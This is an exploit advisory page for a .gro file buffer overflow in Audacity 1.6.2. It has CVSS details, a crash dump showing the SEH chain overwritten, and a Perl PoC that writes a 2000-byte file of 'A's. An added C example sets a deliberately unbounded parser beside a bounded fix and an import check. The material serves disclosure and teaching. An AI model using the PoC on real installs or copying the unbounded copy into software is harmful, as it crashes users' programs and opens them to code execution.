Audacity 1.6.2 (.gro File) Local Buffer Overflow PoC

2009.02.10
Credit: Houssamix
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote (CVSS access vector: the crafted .gro file can be delivered remotely, but the victim must import it locally)
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# -----------------------------------------------------------
# Author : Houssamix
# -----------------------------------------------------------
# Audacity 1.6.2 (.gro file) Local buffer overflow PoC
# download : http://audacity.sourceforge.net/
# Audacity® is free, open source software for recording and editing sounds.
#
# Description:
# Select Project > Import MIDI... and import a ".gro" file that contains a
# long run of characters (2000 x 0x41 in this PoC). Audacity crashes with
# the following register state:
#
# EAX:05050504 ECX:01414141 EDX:01520608 EBX:0012F154
# ESP:0012EF10 EBP:00000000 ESI:41414141 EDI:00000000
# EIP:006AEC54 audacity.006AEC54
# Access violation when reading [41414141]
#
# ESI and the faulting address both hold 0x41414141, i.e. bytes taken from
# the file. The pointer to the next SEH record and the SE handler are also
# overwritten by the same data.
#
# PoC:
# --------------------------------------------------------
#!/usr/bin/perl
#[*] Bug : Audacity 1.6.2 (.gro file) Local buffer overflow
use warnings;
use strict;

my $chars = "\x41" x 2000;      # 2000 'A' bytes, enough to reach the SEH chain
my $file  = "hsmx.gro";

# Write (not append) so re-running the script yields the same 2000-byte file.
open(my $FILE, ">", $file) or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created. Import it in Audacity via Project > Import MIDI...\n";
# ----------------------------------------------------------
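The parser pattern behind this bug class, as an added example that is not Audacity's or the Allegro library's code: a token reader in the style of the String_parse::get_nonspace_quoted() routine named in the references, which copies one whitespace-delimited or double-quoted field into a caller's buffer without knowing its capacity, beside a bounded variant and a pre-import check that would refuse hsmx.gro. FIELD_MAX, the function names and the sample text are assumptions made for the example; the 2000-byte payload mirrors the PoC above.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of the caller's stack field (illustrative, not Audacity's constant). */
#define FIELD_MAX 256

/* Vulnerable pattern: copy one token from str[*pos] into `field` with no
 * capacity. Returns bytes written (excluding NUL). A .gro line holding 2000
 * 'A' bytes overruns a FIELD_MAX-byte destination and keeps writing. */
static size_t get_nonspace_quoted_unbounded(const char *str, size_t *pos, char *field)
{
    size_t n = 0;
    while (str[*pos] && isspace((unsigned char)str[*pos]))
        (*pos)++;
    int quoted = (str[*pos] == '"');
    while (str[*pos]) {
        char c = str[*pos];
        if (!quoted && isspace((unsigned char)c))
            break;                  /* unquoted token ends at whitespace */
        (*pos)++;
        field[n++] = c;             /* no bound check: this is the overflow */
        if (quoted && c == '"' && n > 1)
            break;                  /* quoted token ends at the closing quote */
    }
    field[n] = '\0';
    return n;
}

/* Hardened form: caller passes the capacity. Bytes beyond cap-1 are dropped,
 * *truncated is set, and the full token length is returned so the caller can
 * refuse an oversized field instead of silently using a clipped one. */
static size_t get_nonspace_quoted_bounded(const char *str, size_t *pos,
                                          char *field, size_t cap, int *truncated)
{
    size_t n = 0, total = 0;
    *truncated = 0;
    if (cap == 0) { *truncated = 1; return 0; }   /* no room even for the NUL */
    while (str[*pos] && isspace((unsigned char)str[*pos]))
        (*pos)++;
    int quoted = (str[*pos] == '"');
    while (str[*pos]) {
        char c = str[*pos];
        if (!quoted && isspace((unsigned char)c))
            break;
        (*pos)++;
        total++;
        if (n < cap - 1) field[n++] = c; else *truncated = 1;
        if (quoted && c == '"' && total > 1)
            break;
    }
    field[n] = '\0';
    return total;
}

/* Pre-import check: scan a whole text with the bounded reader and return the
 * longest token. Any value >= FIELD_MAX cannot be held in a FIELD_MAX field
 * and is a reason to refuse the file before the real parser sees it. */
static size_t longest_token(const char *text)
{
    char scratch[FIELD_MAX];
    size_t pos = 0, longest = 0;
    int truncated;
    while (text[pos]) {             /* the reader always consumes >= 1 byte here */
        size_t total = get_nonspace_quoted_bounded(text, &pos, scratch, sizeof scratch, &truncated);
        if (total > longest) longest = total;
    }
    return longest;
}

/* Constructed inputs (not real .gro files): a benign line, and the PoC's
 * payload of 2000 'A' (0x41) bytes as the Perl script writes to hsmx.gro. */
static const char benign_text[] = "name \"quoted token\" 123\n";
static char poc_text[2001];
static const char *build_poc_text(void)
{
    memset(poc_text, 'A', 2000);
    poc_text[2000] = '\0';
    return poc_text;
}

/* 1 if the PoC payload holds a token that cannot fit a FIELD_MAX field. */
static int poc_would_overflow(void) { return longest_token(build_poc_text()) >= FIELD_MAX; }

/* "ABCDEFGHIJ" into an 8-byte buffer: expect "ABCDEFG", truncation flagged,
 * full length 10 reported, and *pos left at the separating space. */
static int bounded_truncation_demo(void)
{
    char buf[8]; size_t pos = 0; int truncated = 0;
    size_t total = get_nonspace_quoted_bounded("ABCDEFGHIJ rest", &pos, buf, sizeof buf, &truncated);
    return total == 10 && truncated == 1 && strcmp(buf, "ABCDEFG") == 0 && pos == 10;
}

/* The unbounded reader on input that fits: "  hello world" yields "hello". */
static int unbounded_short_demo(void)
{
    char buf[FIELD_MAX]; size_t pos = 0;
    size_t n = get_nonspace_quoted_unbounded("  hello world", &pos, buf);
    return n == 5 && strcmp(buf, "hello") == 0 && pos == 7;
}

int main(void)
{
    printf("longest token: benign=%zu poc=%zu overflow=%s\n", longest_token(benign_text),
           longest_token(build_poc_text()), poc_would_overflow() ? "yes" : "no");
    printf("bounded demo %s, unbounded demo %s\n", bounded_truncation_demo() ? "ok" : "FAIL",
           unbounded_short_demo() ? "ok" : "FAIL");
    return 0;
}
```

The unbounded reader is only ever called on input that fits in the demo; running it on the 2000-byte payload is exactly the crash the advisory describes. The bounded reader returns the full token length rather than the stored length so a caller can distinguish "fit" from "clipped" and reject the file, which is the check an importer should perform before handing a .gro file to the MIDI parser.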

References:

http://www.securityfocus.com/bid/33090
http://www.milw0rm.com/exploits/7634
http://www.frsirt.com/english/advisories/2009/0008
http://secunia.com/advisories/33356
http://osvdb.org/51070
http://n2.nabble.com/Audacity-%22String_parse::get_nonspace_quoted()%22-Buffer-Overflow-td2139537.html
http://bugs.gentoo.org/show_bug.cgi?id=253493


Copyright 2022, cxsecurity.com
